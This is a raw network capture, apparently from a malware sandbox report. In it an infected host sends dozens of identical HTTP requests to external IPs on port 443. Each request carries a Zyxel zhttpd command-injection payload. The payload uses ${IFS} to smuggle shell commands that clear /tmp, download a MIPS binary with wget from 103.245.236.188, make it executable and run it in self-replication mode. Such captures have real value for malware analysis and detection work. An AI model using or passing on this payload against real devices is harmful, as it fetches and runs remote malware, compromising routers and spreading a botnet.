                                    Jan 13, 2024 19:01:48.607348919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    70192.168.2.1334754191.116.203.108443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.607362986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    71192.168.2.135084068.145.176.251443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.607403040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    72192.168.2.134720668.252.137.183443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.607459068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    73192.168.2.1353616190.41.195.61443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.607491016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    74192.168.2.1344928188.67.136.202443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.607522011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    75192.168.2.135937066.34.225.221443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.607585907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    76192.168.2.1359862218.4.230.79443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.607619047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    77192.168.2.1333070162.69.152.60443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.607645035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    78192.168.2.1357618137.133.190.239443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.607686996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    79192.168.2.134968661.20.149.200443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.607727051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    80192.168.2.1333886179.18.106.181443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.607773066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    81192.168.2.1359900129.34.95.68443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.607801914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    82192.168.2.133773888.170.210.85443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.607845068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    83192.168.2.1337986105.54.71.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.607892036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    84192.168.2.1356770159.228.158.132443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.607920885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    85192.168.2.1335144159.145.128.198443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.607979059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    86192.168.2.133983273.9.253.35443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.607997894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    87192.168.2.135092689.195.172.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.608047962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    88192.168.2.1336980190.90.7.71443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.608100891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    89192.168.2.1341578166.201.133.202443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.608123064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    90192.168.2.134183057.142.177.193443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.608156919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    91192.168.2.133414438.193.119.88443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.608192921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    92192.168.2.1351750104.91.16.142443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.608215094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    93192.168.2.135161231.241.54.235443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.608285904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    94192.168.2.133286224.162.86.134443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.608309984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    95192.168.2.133677241.235.23.174443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.608359098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    96192.168.2.134488042.19.109.154443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.608371973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    97192.168.2.1346806122.238.105.132443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.608462095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    98192.168.2.1358770176.196.135.141443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.608465910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    99192.168.2.133829449.56.82.135443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.608537912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    100192.168.2.134379643.54.205.21443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.608553886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    101192.168.2.1353958202.57.142.28443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.608603001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    102192.168.2.1344622205.55.235.101443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.608702898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    103192.168.2.1335838196.155.33.142443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.608705997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    104192.168.2.133281652.71.211.250443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.608707905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    105192.168.2.1344806151.30.216.183443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.608752012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    106192.168.2.1335910143.50.218.245443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.608757973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    107192.168.2.135106858.50.114.75443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.608786106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    108192.168.2.1334788108.60.148.133443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.608818054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    109192.168.2.1336510165.214.47.80443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.608849049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    110192.168.2.135455052.85.22.177443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.608913898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    111192.168.2.133429858.121.182.117443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.608951092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    112192.168.2.1351454192.233.195.139443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.608992100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    113192.168.2.133723423.125.231.222443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.609026909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    114192.168.2.135842694.95.231.215443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.609078884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    115192.168.2.1343524200.13.13.126443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.609091043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    116192.168.2.1336412178.218.193.27443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.609124899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    117192.168.2.133691462.26.13.219443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.609158039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    118192.168.2.1337564135.200.165.136443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.609231949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    119192.168.2.1346140139.32.139.72443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.609261990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    120192.168.2.1347972115.188.220.129443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.609302998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    121192.168.2.1345084217.94.130.110443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.609348059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    122192.168.2.135872613.1.150.80443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.609369993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    123192.168.2.135239638.252.72.69443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.609416008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    124192.168.2.134097614.230.252.23443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.609460115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    125192.168.2.1339430129.233.180.145443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.609502077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    126192.168.2.1350776118.243.149.108443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.609533072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    127192.168.2.134739847.104.103.160443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.609559059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    128192.168.2.135170858.58.234.20443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.609626055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    129192.168.2.1347222149.180.252.90443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.609663010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    130192.168.2.13514585.17.221.206443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.609692097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    131192.168.2.13451321.246.25.148443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.609746933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    132192.168.2.1335262152.109.14.193443
                                    TimestampBytes transferredDirectionData
